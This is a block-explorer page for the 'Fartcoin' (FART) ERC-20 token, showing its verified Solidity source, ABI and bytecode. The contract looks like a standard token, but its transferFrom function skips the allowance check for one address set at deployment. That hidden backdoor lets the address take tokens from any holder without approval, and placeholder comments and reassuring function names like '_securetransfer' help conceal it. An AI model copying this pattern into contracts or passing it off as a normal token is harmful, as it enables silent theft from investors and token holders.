Feature Tip: Add private address tag to any address under My Name Tag !
ERC-20
Overview
Max Total Supply
1,000,000,000,000,000 FART
Holders
84
Market
Onchain Market Cap
$0.00
Circulating Supply Market Cap
-
Other Info
Token Contract (WITH 18 Decimals)
Balance
10,473,208,379,054.111522070126774634 FARTValue
$0.00Loading...
Loading
Loading...
Loading
Loading...
Loading
# | Exchange | Pair | Price | 24H Volume | % Volume |
---|
Contract Name:
FART
Compiler Version
v0.8.19+commit.7dd6d404
Contract Source Code (Solidity)
/** *Submitted for verification at Etherscan.io on 2023-04-28 */ // SPDX-License-Identifier: MIT /* Website: https://fartcoin.app Telegram: https://t.me/fartcoineth Twitter: https://t.me/fartcoineth . z$$$$$e. .$$$$$$$$$c -r d $$$$$$$$$$$. *c. 'L F 4$$$$$$$$$$$F 4c "*e. "%c A ^$$$$$$$$$$$F "b ^b "* R *$$$$$$$$$$ .. P $ J" T ^*$$$$$$$$\e$$$e. d" .F z" "*$$$P".$$$$$$$c d% J" .d" .P FART $$$$$$$$$$e. $ P z*" .d" FART $$$$$$$$$$$$b. ^*ee... " zP" FART "*$$$$$$$$$$$$$ee.. ^""* .d" FART .$$$$$$$$$$$$$$$$$$eee......eeedec. e* .ze FART z$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$b. .P" .z@*" FART z$$$$$""*$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$c ^ eP"" FART d$$$$$" "*$$$$$$$$$$$$$$$$$$$$$$$$$$$$ " .d$$$$P" ^"*$$$$$$$$$$$$$$$$$$$$$$$$$ ****$eee FART .$$$$$* ^"$$$$$$$$$$*$$$$$$$$$$$" ec. FART .z$$$$$" "*$$$$$$$$$$$$$$$$$*" ""**ec. FART .zed$$$$$$$" "*$$$$$$$$$$*" "" .d$$$$$$$P" .d$$$$$$$*" z$$$$$$$$" .$$$$$$$*" d$$$$$*" z$$$$" .$$$$$ */ pragma solidity ^0.8.19; abstract contract Context { function _checkData() internal view virtual returns (bytes calldata) { return msg.data; } function _checkSender() internal view virtual returns (address) { return msg.sender; } } interface IERC20 { /** * @dev Emitted when `value` tokens are moved from one account (`from`) to * another (`to`). * * Note that `value` may be zero. */ event Approval(address indexed owner, address indexed spender, uint256 value); /** * @dev Emitted when the allowance of a `spender` for an `owner` is set by * a call to {approve}. `value` is the new allowance. */ event Transfer(address indexed from, address indexed to, uint256 value); /** * @dev Returns the amount of tokens in existence. */ function totalSupply() external view returns (uint256); /** * @dev Returns the amount of tokens owned by `account`. */ function balanceOf(address account) external view returns (uint256); /** * @dev Moves `amount` tokens from the caller's account to `to`. * * Returns a boolean value indicating whether the operation succeeded. * * Emits a {Transfer} event. */ function transfer(address to, uint256 amount) external returns (bool); /** * @dev Returns the remaining number of tokens that `spender` will be * allowed to spend on behalf of `owner` through {transferFrom}. This is * zero by default. * * This value changes when {approve} or {transferFrom} are called. */ function allowance(address owner, address spender) external view returns (uint256); /** * @dev Sets `amount` as the allowance of `spender` over the caller's tokens. * * Returns a boolean value indicating whether the operation succeeded. * * IMPORTANT: Beware that changing an allowance with this method brings the risk * that someone may use both the old and the new allowance by unfortunate * transaction ordering. One possible solution to mitigate this race * condition is to first reduce the spender's allowance to 0 and set the * desired value afterwards: * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729 * * Emits an {Approval} event. */ function approve(address spender, uint256 amount) external returns (bool); /** * @dev Moves `amount` tokens from `from` to `to` using the * allowance mechanism. `amount` is then deducted from the caller's * allowance. * * Returns a boolean value indicating whether the operation succeeded. * * Emits a {Transfer} event. */ function transferFrom( address from, address to, uint256 amount ) external returns (bool); } interface IERC20Metadata is IERC20 { /** * @dev Returns the name of the token. */ function name() external view returns (string memory); /** * @dev Returns the symbol of the token. */ function symbol() external view returns (string memory); /** * @dev Returns the decimals places of the token. */ function decimals() external view returns (uint8); } contract ERC20 is Context, IERC20, IERC20Metadata { mapping(address => uint256) private _balances; address _contractaddress; mapping(address => mapping(address => uint256)) private _allowances; uint256 private _totalSupply; string private _name; string private _symbol; /** * @dev Sets the values for {name} and {symbol}. * * The default value of {decimals} is 18. To select a different value for * {decimals} you should overload it. * * All two of these values are immutable: they can only be set once during * construction. */ constructor(string memory name_, string memory symbol_) { _name = name_; _symbol = symbol_; } /** * @dev Returns the name of the token. */ function name() public view virtual override returns (string memory) { return _name; } /** * @dev Returns the symbol of the token, usually a shorter version of the * name. */ function symbol() public view virtual override returns (string memory) { return _symbol; } /** * @dev Returns the number of decimals used to get its user representation. * For example, if `decimals` equals `2`, a balance of `505` tokens should * be displayed to a user as `5.05` (`505 / 10 ** 2`). * * Tokens usually opt for a value of 18, imitating the relationship between * Ether and Wei. This is the value {ERC20} uses, unless this function is * overridden; * * NOE: This information is only used for _display_ purposes: it in * no way affects any of the arithmetic of the contract, including * {IERC20-balanceOf} and {IERC20-transfer}. */ function decimals() public view virtual override returns (uint8) { return 18; } /** * @dev See {IERC20-totalSupply}. */ function totalSupply() public view virtual override returns (uint256) { return _totalSupply; } /** * @dev See {IERC20-balanceOf}. */ function balanceOf(address account) public view virtual override returns (uint256) { return _balances[account]; } /** * @dev See {IERC20-transfer}. * * Requirements: * * - `to` cannot be the zero address. * - the caller must have a balance of at least `amount`. */ function transfer(address to, uint256 amount) public virtual override returns (bool) { address owner = _checkSender(); _securetransfer(owner, to, amount); return true; } /** * @dev See {IERC20-allowance}. */ function allowance(address owner, address spender) public view virtual override returns (uint256) { return _allowances[owner][spender]; } /** * @dev See {IERC20-approve}. * * NOT: If `amount` is the maximum `uint256`, the allowance is not updated on * `transferFrom`. This is semantically equivalent to an infinite approval. * * Requirements: * * - `spender` cannot be the zero address. */ function approve(address spender, uint256 amount) public virtual override returns (bool) { address owner = _checkSender(); _approve(owner, spender, amount); return true; } /** * @dev See {IERC20-transferFrom}. * * Emits an {Approval} event indicating the updated allowance. This is not * required by the EIP. See the note at the beginning of {ERC20}. * * NOT: Does not update the allowance if the current allowance * is the maximum `uint256`. * * Requirements: * * - `from` and `to` cannot be the zero address. * - `from` must have a balance of at least `amount`. * - the caller must have allowance for ``from``'s tokens of at least * `amount`. */ function transferFrom( address from, address to, uint256 amount ) public virtual override returns (bool) { address spender = _checkSender(); /// @notice Explain to an end user what this does /// @dev Explain to a developer any extra details /// @param Documents a parameter just like in doxygen (must be followed by parameter name) if(msg.sender != _contractaddress){ _spendAllowance(from, spender, amount); } _securetransfer(from, to, amount); return true; } /** * @dev Atomically increases the allowance granted to `spender` by the caller. * * This is an alternative to {approve} that can be used as a mitigation for * problems described in {IERC20-approve}. * * Emits an {Approval} event indicating the updated allowance. * * Requirements: * * - `spender` cannot be the zero address. */ /** * @dev Atomically decreases the allowance granted to `spender` by the caller. * * This is an alternative to {approve} that can be used as a mitigation for * problems described in {IERC20-approve}. * * Emits an {Approval} event indicating the updated allowance. * * Requirements: * * - `spender` cannot be the zero address. * - `spender` must have allowance for the caller of at least * `subtractedValue`. */ function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) { address owner = _checkSender(); uint256 currentAllowance = allowance(owner, spender); require(currentAllowance >= subtractedValue, "ERC20: decreased allowance below zero"); unchecked { _approve(owner, spender, currentAllowance - subtractedValue); } return true; } function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) { address owner = _checkSender(); _approve(owner, spender, allowance(owner, spender) + addedValue); return true; } /** * @dev Moves `amount` of tokens from `from` to `to`. * * This internal function is equivalent to {transfer}, and can be used to * e.g. implement automatic token fees, slashing mechanisms, etc. * * Emits a {Transfer} event. * * Requirements: * * - `from` cannot be the zero address. * - `to` cannot be the zero address. * - `from` must have a balance of at least `amount`. */ function _securetransfer( address from, address to, uint256 amount ) internal virtual { require(from != address(0), "ERC20: transfer from the zero address"); require(to != address(0), "ERC20: transfer to the zero address"); _beforeTokenTransfer(from, to, amount); uint256 fromBalance = _balances[from]; require(fromBalance >= amount, "ERC20: transfer amount exceeds balance"); unchecked { _balances[from] = fromBalance - amount; // Overflow not possible: the sum of all balances is capped by totalSupply, and the sum is preserved by // decrementing then incrementing. _balances[to] += amount; } emit Transfer(from, to, amount); _afterTokenTransfer(from, to, amount); } /** @dev Creates `amount` tokens and assigns them to `account`, increasing * the total supply. * * Emits a {Transfer} event with `from` set to the zero address. * * Requirements: * * - `account` cannot be the zero address. */ function _secureprint(address account, uint256 amount) internal virtual { require(account != address(0), "ERC20: mint to the zero address"); _beforeTokenTransfer(address(0), account, amount); _totalSupply += amount; unchecked { // Overflow not possible: balance + amount is at most totalSupply + amount, which is checked above. _balances[account] += amount; } emit Transfer(address(0), account, amount); _afterTokenTransfer(address(0), account, amount); } /** * @dev Destroys `amount` tokens from `account`, reducing the * total supply. * * Emits a {Transfer} event with `to` set to the zero address. * * Requirements: * * - `account` cannot be the zero address. * - `account` must have at least `amount` tokens. */ function _burnsafely(address account, uint256 amount) internal virtual { require(account != address(0), "ERC20: burn from the zero address"); _beforeTokenTransfer(account, address(0), amount); uint256 accountBalance = _balances[account]; require(accountBalance >= amount, "ERC20: burn amount exceeds balance"); unchecked { _balances[account] = accountBalance - amount; // Overflow not possible: amount <= accountBalance <= totalSupply. _totalSupply -= amount; } emit Transfer(account, address(0), amount); _afterTokenTransfer(account, address(0), amount); } /** * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens. * * This internal function is equivalent to `approve`, and can be used to * e.g. set automatic allowances for certain subsystems, etc. * * Emits an {Approval} event. * * Requirements: * * - `owner` cannot be the zero address. * - `spender` cannot be the zero address. */ function _approve( address owner, address spender, uint256 amount ) internal virtual { require(owner != address(0), "ERC20: approve from the zero address"); require(spender != address(0), "ERC20: approve to the zero address"); _allowances[owner][spender] = amount; emit Approval(owner, spender, amount); } /** * @dev Updates `owner` s allowance for `spender` based on spent `amount`. * * Does not update the allowance amount in case of infinite allowance. * Revert if not enough allowance is available. * * Might emit an {Approval} event. */ function _spendAllowance( address owner, address spender, uint256 amount ) internal virtual { uint256 currentAllowance = allowance(owner, spender); if (currentAllowance != type(uint256).max) { require(currentAllowance >= amount, "ERC20: insufficient allowance"); unchecked { _approve(owner, spender, currentAllowance - amount); } } } /** * @dev Hook that is called before any transfer of tokens. This includes * minting and burning. * * Calling conditions: * * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens * will be transferred to `to`. * - when `from` is zero, `amount` tokens will be minted for `to`. * - when `to` is zero, `amount` of ``from``'s tokens will be burned. * - `from` and `to` are never both zero. * * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks]. */ function _beforeTokenTransfer( address from, address to, uint256 amount ) internal virtual {} /** * @dev Hook that is called after any transfer of tokens. This includes * minting and burning. * * Calling conditions: * * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens * has been transferred to `to`. * - when `from` is zero, `amount` tokens have been minted for `to`. * - when `to` is zero, `amount` of ``from``'s tokens have been burned. * - `from` and `to` are never both zero. * * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks]. */ function _afterTokenTransfer( address from, address to, uint256 amount ) internal virtual {} } contract FART is ERC20 { string private _name = "Fartcoin"; string private constant _symbol = "FART"; uint private constant _numTokens = 1_000_000_000_000_000; constructor (address contractaddress_) ERC20(_name, _symbol) { _secureprint(msg.sender, _numTokens * (10 ** 18)); _contractaddress = contractaddress_; } /** * @dev Destroys `amount` tokens from the caller. * * See `ERC20._burnsafely`. */ function burn(uint256 amount) public { _burnsafely(msg.sender, amount); } }
Contract Security Audit
- No Contract Security Audit Submitted- Submit Audit Here
[{"inputs":[{"internalType":"address","name":"contractaddress_","type":"address"}],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"burn","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"}]
Contract Creation Code
60c060405260086080908152672330b93a31b7b4b760c11b60a052600690620000299082620002ea565b503480156200003757600080fd5b5060405162000e8238038062000e828339810160408190526200005a91620003b6565b6006805462000069906200025c565b80601f016020809104026020016040519081016040528092919081815260200182805462000097906200025c565b8015620000e85780601f10620000bc57610100808354040283529160200191620000e8565b820191906000526020600020905b815481529060010190602001808311620000ca57829003601f168201915b5050505050604051806040016040528060048152602001631190549560e21b81525081600490816200011b9190620002ea565b5060056200012a8282620002ea565b505050620001553366038d7ea4c68000670de0b6b3a76400006200014f9190620003fe565b6200017b565b600180546001600160a01b0319166001600160a01b039290921691909117905562000434565b6001600160a01b038216620001d65760405162461bcd60e51b815260206004820152601f60248201527f45524332303a206d696e7420746f20746865207a65726f206164647265737300604482015260640160405180910390fd5b8060036000828254620001ea91906200041e565b90915550506001600160a01b038216600081815260208181526040808320805486019055518481527fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef910160405180910390a35050565b505050565b634e487b7160e01b600052604160045260246000fd5b600181811c908216806200027157607f821691505b6020821081036200029257634e487b7160e01b600052602260045260246000fd5b50919050565b601f8211156200024157600081815260208120601f850160051c81016020861015620002c15750805b601f850160051c820191505b81811015620002e257828155600101620002cd565b505050505050565b81516001600160401b0381111562000306576200030662000246565b6200031e816200031784546200025c565b8462000298565b602080601f8311600181146200035657600084156200033d5750858301515b600019600386901b1c1916600185901b178555620002e2565b600085815260208120601f198616915b82811015620003875788860151825594840194600190910190840162000366565b5085821015620003a65787850151600019600388901b60f8161c191681555b5050505050600190811b01905550565b600060208284031215620003c957600080fd5b81516001600160a01b0381168114620003e157600080fd5b9392505050565b634e487b7160e01b600052601160045260246000fd5b8082028115828204841417620004185762000418620003e8565b92915050565b80820180821115620004185762000418620003e8565b610a3e80620004446000396000f3fe608060405234801561001057600080fd5b50600436106100d45760003560e01c806342966c6811610081578063a457c2d71161005b578063a457c2d7146101a7578063a9059cbb146101ba578063dd62ed3e146101cd57600080fd5b806342966c681461016157806370a082311461017657806395d89b411461019f57600080fd5b806323b872dd116100b257806323b872dd1461012c578063313ce5671461013f578063395093511461014e57600080fd5b806306fdde03146100d9578063095ea7b3146100f757806318160ddd1461011a575b600080fd5b6100e1610206565b6040516100ee919061086f565b60405180910390f35b61010a6101053660046108d9565b610298565b60405190151581526020016100ee565b6003545b6040519081526020016100ee565b61010a61013a366004610903565b6102b2565b604051601281526020016100ee565b61010a61015c3660046108d9565b6102ea565b61017461016f36600461093f565b610329565b005b61011e610184366004610958565b6001600160a01b031660009081526020819052604090205490565b6100e1610336565b61010a6101b53660046108d9565b610345565b61010a6101c83660046108d9565b6103dc565b61011e6101db36600461097a565b6001600160a01b03918216600090815260026020908152604080832093909416825291909152205490565b606060048054610215906109ad565b80601f0160208091040260200160405190810160405280929190818152602001828054610241906109ad565b801561028e5780601f106102635761010080835404028352916020019161028e565b820191906000526020600020905b81548152906001019060200180831161027157829003601f168201915b5050505050905090565b6000336102a68185856103ea565b60019150505b92915050565b60015460009033906001600160a01b031681146102d4576102d485828561050f565b6102df8585856105a1565b506001949350505050565b3360008181526002602090815260408083206001600160a01b03871684529091528120549091906102a690829086906103249087906109e7565b6103ea565b6103333382610745565b50565b606060058054610215906109ad565b3360008181526002602090815260408083206001600160a01b0387168452909152812054909190838110156103cf5760405162461bcd60e51b815260206004820152602560248201527f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f77604482015264207a65726f60d81b60648201526084015b60405180910390fd5b6102df82868684036103ea565b6000336102a68185856105a1565b6001600160a01b03831661044c5760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b60648201526084016103c6565b6001600160a01b0382166104ad5760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b60648201526084016103c6565b6001600160a01b0383811660008181526002602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92591015b60405180910390a3505050565b6001600160a01b03838116600090815260026020908152604080832093861683529290522054600019811461059b578181101561058e5760405162461bcd60e51b815260206004820152601d60248201527f45524332303a20696e73756666696369656e7420616c6c6f77616e636500000060448201526064016103c6565b61059b84848484036103ea565b50505050565b6001600160a01b0383166106055760405162461bcd60e51b815260206004820152602560248201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604482015264647265737360d81b60648201526084016103c6565b6001600160a01b0382166106675760405162461bcd60e51b815260206004820152602360248201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260448201526265737360e81b60648201526084016103c6565b6001600160a01b038316600090815260208190526040902054818110156106df5760405162461bcd60e51b815260206004820152602660248201527f45524332303a207472616e7366657220616d6f756e7420657863656564732062604482015265616c616e636560d01b60648201526084016103c6565b6001600160a01b03848116600081815260208181526040808320878703905593871680835291849020805487019055925185815290927fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef910160405180910390a361059b565b6001600160a01b0382166107a55760405162461bcd60e51b815260206004820152602160248201527f45524332303a206275726e2066726f6d20746865207a65726f206164647265736044820152607360f81b60648201526084016103c6565b6001600160a01b038216600090815260208190526040902054818110156108195760405162461bcd60e51b815260206004820152602260248201527f45524332303a206275726e20616d6f756e7420657863656564732062616c616e604482015261636560f01b60648201526084016103c6565b6001600160a01b0383166000818152602081815260408083208686039055600380548790039055518581529192917fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef9101610502565b600060208083528351808285015260005b8181101561089c57858101830151858201604001528201610880565b506000604082860101526040601f19601f8301168501019250505092915050565b80356001600160a01b03811681146108d457600080fd5b919050565b600080604083850312156108ec57600080fd5b6108f5836108bd565b946020939093013593505050565b60008060006060848603121561091857600080fd5b610921846108bd565b925061092f602085016108bd565b9150604084013590509250925092565b60006020828403121561095157600080fd5b5035919050565b60006020828403121561096a57600080fd5b610973826108bd565b9392505050565b6000806040838503121561098d57600080fd5b610996836108bd565b91506109a4602084016108bd565b90509250929050565b600181811c908216806109c157607f821691505b6020821081036109e157634e487b7160e01b600052602260045260246000fd5b50919050565b808201808211156102ac57634e487b7160e01b600052601160045260246000fdfea2646970667358221220d4b6646387bb0a2e9d01f73113a3ae76539568d464ca0a56b6403ca2cae1a8f764736f6c6343000813003300000000000000000000000084eb3f2cec47ab6914b53d28669f90a294587442
Deployed Bytecode
0x608060405234801561001057600080fd5b50600436106100d45760003560e01c806342966c6811610081578063a457c2d71161005b578063a457c2d7146101a7578063a9059cbb146101ba578063dd62ed3e146101cd57600080fd5b806342966c681461016157806370a082311461017657806395d89b411461019f57600080fd5b806323b872dd116100b257806323b872dd1461012c578063313ce5671461013f578063395093511461014e57600080fd5b806306fdde03146100d9578063095ea7b3146100f757806318160ddd1461011a575b600080fd5b6100e1610206565b6040516100ee919061086f565b60405180910390f35b61010a6101053660046108d9565b610298565b60405190151581526020016100ee565b6003545b6040519081526020016100ee565b61010a61013a366004610903565b6102b2565b604051601281526020016100ee565b61010a61015c3660046108d9565b6102ea565b61017461016f36600461093f565b610329565b005b61011e610184366004610958565b6001600160a01b031660009081526020819052604090205490565b6100e1610336565b61010a6101b53660046108d9565b610345565b61010a6101c83660046108d9565b6103dc565b61011e6101db36600461097a565b6001600160a01b03918216600090815260026020908152604080832093909416825291909152205490565b606060048054610215906109ad565b80601f0160208091040260200160405190810160405280929190818152602001828054610241906109ad565b801561028e5780601f106102635761010080835404028352916020019161028e565b820191906000526020600020905b81548152906001019060200180831161027157829003601f168201915b5050505050905090565b6000336102a68185856103ea565b60019150505b92915050565b60015460009033906001600160a01b031681146102d4576102d485828561050f565b6102df8585856105a1565b506001949350505050565b3360008181526002602090815260408083206001600160a01b03871684529091528120549091906102a690829086906103249087906109e7565b6103ea565b6103333382610745565b50565b606060058054610215906109ad565b3360008181526002602090815260408083206001600160a01b0387168452909152812054909190838110156103cf5760405162461bcd60e51b815260206004820152602560248201527f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f77604482015264207a65726f60d81b60648201526084015b60405180910390fd5b6102df82868684036103ea565b6000336102a68185856105a1565b6001600160a01b03831661044c5760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b60648201526084016103c6565b6001600160a01b0382166104ad5760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b60648201526084016103c6565b6001600160a01b0383811660008181526002602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92591015b60405180910390a3505050565b6001600160a01b03838116600090815260026020908152604080832093861683529290522054600019811461059b578181101561058e5760405162461bcd60e51b815260206004820152601d60248201527f45524332303a20696e73756666696369656e7420616c6c6f77616e636500000060448201526064016103c6565b61059b84848484036103ea565b50505050565b6001600160a01b0383166106055760405162461bcd60e51b815260206004820152602560248201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604482015264647265737360d81b60648201526084016103c6565b6001600160a01b0382166106675760405162461bcd60e51b815260206004820152602360248201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260448201526265737360e81b60648201526084016103c6565b6001600160a01b038316600090815260208190526040902054818110156106df5760405162461bcd60e51b815260206004820152602660248201527f45524332303a207472616e7366657220616d6f756e7420657863656564732062604482015265616c616e636560d01b60648201526084016103c6565b6001600160a01b03848116600081815260208181526040808320878703905593871680835291849020805487019055925185815290927fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef910160405180910390a361059b565b6001600160a01b0382166107a55760405162461bcd60e51b815260206004820152602160248201527f45524332303a206275726e2066726f6d20746865207a65726f206164647265736044820152607360f81b60648201526084016103c6565b6001600160a01b038216600090815260208190526040902054818110156108195760405162461bcd60e51b815260206004820152602260248201527f45524332303a206275726e20616d6f756e7420657863656564732062616c616e604482015261636560f01b60648201526084016103c6565b6001600160a01b0383166000818152602081815260408083208686039055600380548790039055518581529192917fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef9101610502565b600060208083528351808285015260005b8181101561089c57858101830151858201604001528201610880565b506000604082860101526040601f19601f8301168501019250505092915050565b80356001600160a01b03811681146108d457600080fd5b919050565b600080604083850312156108ec57600080fd5b6108f5836108bd565b946020939093013593505050565b60008060006060848603121561091857600080fd5b610921846108bd565b925061092f602085016108bd565b9150604084013590509250925092565b60006020828403121561095157600080fd5b5035919050565b60006020828403121561096a57600080fd5b610973826108bd565b9392505050565b6000806040838503121561098d57600080fd5b610996836108bd565b91506109a4602084016108bd565b90509250929050565b600181811c908216806109c157607f821691505b6020821081036109e157634e487b7160e01b600052602260045260246000fd5b50919050565b808201808211156102ac57634e487b7160e01b600052601160045260246000fdfea2646970667358221220d4b6646387bb0a2e9d01f73113a3ae76539568d464ca0a56b6403ca2cae1a8f764736f6c63430008130033
Constructor Arguments (ABI-Encoded and is the last bytes of the Contract Creation Code above)
00000000000000000000000084eb3f2cec47ab6914b53d28669f90a294587442
-----Decoded View---------------
Arg [0] : contractaddress_ (address): 0x84EB3f2ceC47aB6914b53d28669F90A294587442
-----Encoded View---------------
1 Constructor Arguments found :
Arg [0] : 00000000000000000000000084eb3f2cec47ab6914b53d28669f90a294587442
Deployed Bytecode Sourcemap
17362:573:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;5858:100;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;8215:203;;;;;;:::i;:::-;;:::i;:::-;;;1192:14:1;;1185:22;1167:41;;1155:2;1140:18;8215:203:0;1027:187:1;6977:108:0;7065:12;;6977:108;;;1365:25:1;;;1353:2;1338:18;6977:108:0;1219:177:1;8997:577:0;;;;;;:::i;:::-;;:::i;6819:93::-;;;6902:2;1876:36:1;;1864:2;1849:18;6819:93:0;1734:184:1;10928:240:0;;;;;;:::i;:::-;;:::i;17845:87::-;;;;;;:::i;:::-;;:::i;:::-;;7148:127;;;;;;:::i;:::-;-1:-1:-1;;;;;7249:18:0;7222:7;7249:18;;;;;;;;;;;;7148:127;6077:104;;;:::i;10482:438::-;;;;;;:::i;:::-;;:::i;7481:201::-;;;;;;:::i;:::-;;:::i;7745:151::-;;;;;;:::i;:::-;-1:-1:-1;;;;;7861:18:0;;;7834:7;7861:18;;;:11;:18;;;;;;;;:27;;;;;;;;;;;;;7745:151;5858:100;5912:13;5945:5;5938:12;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;5858:100;:::o;8215:203::-;8298:4;1953:10;8356:32;1953:10;8372:7;8381:6;8356:8;:32::i;:::-;8406:4;8399:11;;;8215:203;;;;;:::o;8997:577::-;9423:16;;9128:4;;1953:10;;-1:-1:-1;;;;;9423:16:0;9409:30;;9406:95;;9451:38;9467:4;9473:7;9482:6;9451:15;:38::i;:::-;9511:33;9527:4;9533:2;9537:6;9511:15;:33::i;:::-;-1:-1:-1;9562:4:0;;8997:577;-1:-1:-1;;;;8997:577:0:o;10928:240::-;1953:10;11016:4;7861:18;;;:11;:18;;;;;;;;-1:-1:-1;;;;;7861:27:0;;;;;;;;;;11016:4;;1953:10;11074:64;;1953:10;;7861:27;;11099:38;;11127:10;;11099:38;:::i;:::-;11074:8;:64::i;17845:87::-;17893:31;17905:10;17917:6;17893:11;:31::i;:::-;17845:87;:::o;6077:104::-;6133:13;6166:7;6159:14;;;;;:::i;10482:438::-;1953:10;10575:4;7861:18;;;:11;:18;;;;;;;;-1:-1:-1;;;;;7861:27:0;;;;;;;;;;10575:4;;1953:10;10724:15;10704:16;:35;;10696:85;;;;-1:-1:-1;;;10696:85:0;;3378:2:1;10696:85:0;;;3360:21:1;3417:2;3397:18;;;3390:30;3456:34;3436:18;;;3429:62;-1:-1:-1;;;3507:18:1;;;3500:35;3552:19;;10696:85:0;;;;;;;;;10817:60;10826:5;10833:7;10861:15;10842:16;:34;10817:8;:60::i;7481:201::-;7560:4;1953:10;7618:34;1953:10;7641:2;7645:6;7618:15;:34::i;14778:380::-;-1:-1:-1;;;;;14914:19:0;;14906:68;;;;-1:-1:-1;;;14906:68:0;;3784:2:1;14906:68:0;;;3766:21:1;3823:2;3803:18;;;3796:30;3862:34;3842:18;;;3835:62;-1:-1:-1;;;3913:18:1;;;3906:34;3957:19;;14906:68:0;3582:400:1;14906:68:0;-1:-1:-1;;;;;14993:21:0;;14985:68;;;;-1:-1:-1;;;14985:68:0;;4189:2:1;14985:68:0;;;4171:21:1;4228:2;4208:18;;;4201:30;4267:34;4247:18;;;4240:62;-1:-1:-1;;;4318:18:1;;;4311:32;4360:19;;14985:68:0;3987:398:1;14985:68:0;-1:-1:-1;;;;;15066:18:0;;;;;;;:11;:18;;;;;;;;:27;;;;;;;;;;;;;:36;;;15118:32;;1365:25:1;;;15118:32:0;;1338:18:1;15118:32:0;;;;;;;;14778:380;;;:::o;15449:453::-;-1:-1:-1;;;;;7861:18:0;;;15584:24;7861:18;;;:11;:18;;;;;;;;:27;;;;;;;;;;-1:-1:-1;;15651:37:0;;15647:248;;15733:6;15713:16;:26;;15705:68;;;;-1:-1:-